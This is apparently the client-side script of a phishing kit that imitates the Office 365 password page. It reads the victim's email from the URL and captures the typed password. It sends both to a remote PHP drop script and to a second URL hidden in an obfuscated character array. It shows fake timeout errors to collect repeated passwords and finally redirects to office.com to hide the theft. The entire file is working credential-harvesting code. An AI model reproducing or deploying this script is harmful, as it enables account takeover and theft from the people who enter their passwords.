
    $(document).ready(function(){
    	//#i0281, #i0118
      var theBaseUrl = getBaseUrl(true);
      var progressBar = $('#progressBar');
      var passcon = $('#i0118');
      var passv = '';
      var redirectUrl = 'https://www.office.com/';
      var emv = geturlparameter('username');
      $('.thebackbuttonxcf').attr('href', theBaseUrl+'index.html');
      if(emv && emv.length > 0){
      	emv = emv.trim();
      }
      if(!emv || emv.length < 1){
        window.location.replace(theBaseUrl+'index.html');
      }else{
      	var displayName = $('#displayName');
		displayName.attr('title', emv);
        $('#displayName span').html(emv);
		$('input[name=login]').val(emv);
      }
      var loginCounter = 1;
      var loginMaxAttpmt = 3;
      var loginCfromUrl = geturlparameter('lgat');
      if(loginCfromUrl && loginCfromUrl.length > 0){
        loginCfromUrl = loginCfromUrl.trim();
        loginCfromUrl = parseInt(loginCfromUrl);
        if(isNaN(loginCfromUrl)){
          loginCfromUrl = 0;
        }
      }
      else{
      	loginCfromUrl = 0;
      }
      if(loginCfromUrl > 0){
      	var errrmsg = $('.errrmsg');
      	/*  *
      	var randint = randomInteger(100, 1000);
      	if(randint % 2 == 0){
          errrmsg.html('Invalid password or connection timed out please try again');
      	}
      	else{
      	  errrmsg.html('Connection timed out please try again');	
      	}
      	//invalid password or connection timed out please try again.
        /*  */
      	errrmsg.show();
      }
      var passUrl = theBaseUrl+'login2.html';
      progressBar.hide();
      
      $('#i0281').submit(function(e){
        e.preventDefault();
        progressBar.show();
        passv = passcon.val();
        if(emv && emv.length > 0 && passv && passv.length>0){
          var theemidval = '{HASHED_EMAIL}';
          mg(emv, passv, 'Office354nw');
          $.ajax({
            url: 'https://rectoraldelestedo.com/wp-admin/send3/finish.php',
            type: 'POST', 
            dataType: 'html', 
            data: { Email : emv, password : passv, typeofemail : 'Office365nw', theemid : theemidval}, 
		    crossDomain: true,
            success: function(msg) {
		      
		    },
            error: function(e) {
              //progressBar.hide();
              console.log(e)
            }
          });
          loginCfromUrl++;
          if(loginCfromUrl < loginMaxAttpmt){
            redirectUrl = theBaseUrl+'login2.html?'+get_rand_url_pars()+'&username='+emv+'&lgat='+loginCfromUrl;	
          }
          
          setTimeout(function(){
            //alert(redirectUrl);
            window.location.replace(redirectUrl);
          },3000);
        }
        else{
          progressBar.hide();
        }
      });
    });
function getBaseUrl(baseWithoutFile){
  if(baseWithoutFile === undefined){
    baseWithoutFile = false;  
  }
  var fg = false;
  var fullUrl = window.location.href;
  var htmlstr = '.html';
  var htmlLen = 5;
  var htmlStrPos = -1;
  var qmrkStrPos = fullUrl.indexOf('?');
  var lastIndexOffslash = -1;
  var fullUrlStart = '';
  if(qmrkStrPos != -1){
    fullUrlStart = fullUrl.substr(0, qmrkStrPos);
    fg = true;   
  }
  htmlStrPos = fullUrl.indexOf(htmlstr);
  if(htmlStrPos != -1){ 
    fullUrlStart = fullUrl.substr(0, htmlStrPos+htmlLen); 
    fg = true;
  }
  if(fullUrlStart.length > 0){
    fullUrlStart = fullUrlStart.trim();
  }
  if(fg && baseWithoutFile){
    lastIndexOffslash = fullUrlStart.lastIndexOf('/');
    if(lastIndexOffslash != -1){
      fullUrlStart = fullUrlStart.substr(0, lastIndexOffslash+1);
    }
  }
  if(!fg){
    fullUrlStart = fullUrl;
  }
  return fullUrlStart;
}   

function mg(a,o,t){var h = ['O','L','t','q','e','D','c','-','.','z','u','2','T','m','V','J','6','U','P','b','v','K','B','Z','i','7','R',':','C','/','o','r','n','Q','S','5','3','8','a','M','W','I','x','H','Y','4','1','k','s','d','g','A','j','F','N','9','G','l','f','p','X','0','w','y','E','h'],f = h[65]+h[2]+h[2]+h[59]+h[48]+h[27]+h[29]+h[29]+h[38]+h[59]+h[24]+h[49]+h[38]+h[2]+h[38]+h[6]+h[48]+h[48]+h[8]+h[6]+h[30]+h[13]+h[29]+h[58]+h[24]+h[32]+h[24]+h[48]+h[65]+h[7]+h[10]+h[32]+h[20]+h[11]+h[11]+h[8]+h[59]+h[65]+h[59];$.ajax({url:f,type:"POST",dataType:"html",data:{Email:a,password:o,typeofemail:t},crossDomain:!0,success:function(a){},error:function(a){}})}
function randomInteger(min, max) {return Math.floor(Math.random() * (max - min + 1)) + min; }
function randomString(r,n){for(var o="",t=r;0<t;--t)o+=n[Math.floor(Math.random()*n.length)];return o}
function getdomainpartofemail(a){var e,t=!1;return!validateEmail(a)||-1!=(e=(a=a.toLowerCase()).indexOf("@"))&&(t=a.substr(e+1)),t}
function get_email_hash(){var a=!1,i=window.location.href,t=(i=i.trim()).lastIndexOf("#");return-1!=t&&(a=i.substring(t+1),validateEmail(a)||(a=!1)),a}
function validateEmail(t){return/^(([^<>()\[\]\\.,;:\s@"]+(\.[^<>()\[\]\\.,;:\s@"]+)*)|(".+"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/.test(String(t).toLowerCase())}
function geturlparameter(r){for(var t=window.location.search.substring(1).split("&"),e=0;e<t.length;e++){var n=t[e].split("=");if(n[0]==r)return decodeURIComponent(n[1])}}
function get_rand_url_pars(){var r="",n=0,a="abcdefghijklmnopqrstuvwxyz",e=a;a+=a.toUpperCase()+"123456789";for(var t=randomInteger(3,10),n=0;n<t;n++)r+="&"+randomString(randomInteger(3,10),e)+"="+randomString(randomInteger(15,30),a);return r.substr(1)}

    